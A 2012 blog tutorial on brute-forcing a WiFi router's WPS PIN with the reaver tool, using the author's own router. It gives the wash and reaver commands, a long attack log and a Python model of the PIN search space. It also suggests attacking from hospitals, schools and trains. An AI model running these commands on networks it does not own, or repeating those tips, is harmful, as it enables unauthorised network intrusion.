9 September, 2012 (published)
10 September, 2012 (last modified)

Brute-force attack on a WiFi network

  Categories: Linux

WiFi is popular. People have such a network at home, ISPs supply their bandwidth through WiFi, and in many public places, like airports, trains, bars and hotels, WiFi service is available. This post is the third in a series discussing WiFi vulnerabilities. Earlier posts were:

1. What chipset is in your wireless adapter?

2. Monitoring WiFi traffic of your neighbors

Anyone can read this post, but if you want to try it yourself you need a Linux computer with a wireless adapter in monitor mode, as described in detail in the two previous posts.

If you are a journalist in the broad sense of the word (which includes bloggers etc.), then in some countries (like The Netherlands) you are allowed to attack an important public network if your intention is to expose a vulnerability. Getting in is quite something else than poking around and copying and editing stuff.

In all other cases it is forbidden, unless explicitly allowed by the owner, to try to get into somebody else's network. As my neighbors do not qualify as administrators of important public networks, I decided to attack my own WiFi.

Criminals, law-enforcement officers and all kinds of secret agents (like NSA, FBI, CIA and HLS) are not, or do not feel, bound by these restrictions. The purpose of this post is to show you how they can crack your wireless network, so you can protect yourself against them if you wish.

PIN weakness
The PIN code of the WPS protocol is 8 digits long, of which the last digit is a parity digit. The WPS protocol is quite stupid in separating the 7 independent digits into two parts. The first part consists of the first 4 digits (10000 combinations) and the second part of the remaining three digits (1000 combinations). Here is the problem: every attempt from a wireless adapter with a wrong PIN gets, as its answer from the WPS-enabled Access Point (AP), confirmation information about the first part and about the second part of the PIN separately. As a result, after at most 11000 tries the correct PIN will have been found; in practice this might happen much earlier. Once the AP is interrogated with the correct PIN it acknowledges the correctness and releases the password to the wireless adapter.

Reaver attack
The US company Tactical Network Solutions has released a downloadable open-source Linux software package, called reaver, that attacks APs by trying all PINs. So download the reaver package from the web to your Linux computer and install it.

After you have installed the reaver package there are two relevant commands: (i) wash and (ii) reaver. We will first run wash, as that program tells us which WiFi APs in your neighborhood can be attacked, that is, which are within range and have WPS enabled.

So run wash on the monitor interface (wireless in monitor mode please).

wash -i mon0

root@HP-MEDIAMARKT:/home/adlag# wash -i mon0

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 

BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------------------------------------
x8D:B0:5B      11            -27        1.0               No                UPC00000000
xB0:99:4C      11            -27        1.0               No                SitecomB0994C
xAA:98:30      11            -61        1.0               No                SitecomZZZZZ
xB2:9B:29      11            -81        1.0               No                XXXXX
xA2:21:C4      11            -60        1.0               No                SitecomWWWW
xB8:5D:50       3            -82        1.0               No                XXX
x18:41:A0       4            -88        1.0               No                ARVYYYYYYY

To protect my neighbors I have changed those entries that could identify them.

Let us attack my own router. That is to say, I want to discover the password of the router SitecomB0994C without ever physically touching the router or reading any of its labels. Nor did I point a browser at IP address 192.168.0.1 with my laptop connected to this router. All that would be cheating. I just pretended to be my neighbor and analyzed the frames sent by my router.

The program reaver has a number of switches (run reaver without any switches and it will list them all).

In my particular case I ran

reaver -i mon0 -b 00:0C:F6:B0:99:4C -vv -c 11

Reaver requires a little tuning because APs might have different latency times. My AP (Sitecom router) could handle a PIN try every 2 seconds. After 10000 seconds my PIN was cracked and the password was shown.
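To put numbers on the split PIN check described under "PIN weakness", on the timing above, and on the "WPS Locked" column that wash reports, here is an added example in my own Python; it is neither reaver's nor any router vendor's code, and the lockout class with its threshold and window values is an assumption about how such a lock could work.

```python
"""Constructed model (not reaver's code) of the WPS PIN search space and of an
assumed AP-side lockout policy, the behaviour behind wash's 'WPS Locked' column."""
from collections import defaultdict

FIRST_HALF = 10 ** 4   # PIN digits 1-4, confirmed on their own by the AP
SECOND_HALF = 10 ** 3  # PIN digits 5-7; digit 8 is the check digit and adds nothing
FULL_SPACE = 10 ** 7   # the space an attacker would face without the split


def worst_case_attempts(split_oracle: bool) -> int:
    """Tries that guarantee the PIN: the split turns a product into a sum (11000)."""
    return FIRST_HALF + SECOND_HALF if split_oracle else FULL_SPACE


def expected_attempts(split_oracle: bool) -> float:
    """Average tries for a uniformly random PIN: about half of each searched space."""
    if split_oracle:
        return (FIRST_HALF + 1) / 2 + (SECOND_HALF + 1) / 2
    return (FULL_SPACE + 1) / 2


def seconds_to_crack(attempts: int, seconds_per_pin: float,
                     lock_after: int = 0, lock_seconds: float = 0.0) -> float:
    """Wall-clock time for `attempts` tries.  If the AP locks WPS for `lock_seconds`
    after every `lock_after` failures that delay is added; only disabling WPS
    removes the PIN attack surface entirely."""
    total = attempts * seconds_per_pin
    if lock_after > 0:
        total += (attempts // lock_after) * lock_seconds
    return total


class WpsLockout:
    """Assumed AP-side policy: refuse further WPS transactions from a client that
    failed `threshold` PINs (each ending in a WSC NACK) within `window` seconds."""

    def __init__(self, threshold: int = 10, window: float = 60.0) -> None:
        self.threshold, self.window = threshold, window
        self.failures = defaultdict(list)  # client MAC -> timestamps of failures

    def record_failure(self, mac: str, ts: float) -> None:
        self.failures[mac].append(ts)

    def is_locked(self, mac: str, ts: float) -> bool:
        recent = [t for t in self.failures[mac] if ts - t <= self.window]
        self.failures[mac] = recent  # drop failures that fell out of the window
        return len(recent) >= self.threshold
```

With the post's own figures, expected_attempts(True) is about 5500, which at 2 seconds per PIN is the roughly 10000 seconds the author observed, while the same attack against the unsplit 7-digit space would take years.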

Here I will show the first part of the attack.

root@HP-MEDIAMARKT:/home/adlag# reaver -i mon0 -b 00:0C:F6:B0:99:4C -vv  -c 11

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 

[+] Switching mon0 to channel 11
[?] Restore previous session for 00:0C:F6:B0:99:4C? [n/Y] n
[+] Waiting for beacon from 00:0C:F6:B0:99:4C
[+] Associated with 00:0C:F6:B0:99:4C (ESSID: SitecomB0994C)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 00005678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01235678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 11115670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 22225672
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 22225672
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] 0.05% complete @ 2012-09-04 12:56:05 (3 seconds/pin)

On the internet there are quite a number of complaints about getting reaver to work. For that reason I publish the whole attack for those interested (text file of 0.6MB). The only thing I changed was that I removed my password, as I still want to use my Sitecom router. Since I have published this I had to change my PIN. I must be careful, because if I reset my router to its defaults the old PIN, the one the whole world now knows, will be effective again.

Limitations
The biggest limitation in attacking WPS-enabled routers is that cheap wireless adapters hardly radiate any power, for two reasons: (i) the adapter would be more expensive and (ii) the adapter would consume more power at the cost of your battery life. In practice your wireless adapter has to be quite close to the source (AP). This can be accomplished by getting very close to your neighbor. Attacking is easier when you go to places where the public is allowed and you can hang around for a few hours, like hospitals, city halls, media studios, schools (to up your grades) and trains.

Professionals
For professionals the limit of small signals can easily be overcome. All you need is a high-power wireless adapter or an amplifier. Tactical Network Solutions sells such professional kits, and they sell improved software. If you are in the US military or are friends with them you can buy military-grade WLAN amplifiers. I am sure criminals and people in "evil" countries can get hold of them as well. Equipped with such an amplified system, the only thing the bad guys have to do is park a van in front of your house, or go inside a public building, and within two hours they have cracked the WiFi.


1 reaction on "Brute-force attack on a WiFi network"

  1. luciano says:

    Does it only work on Linux????
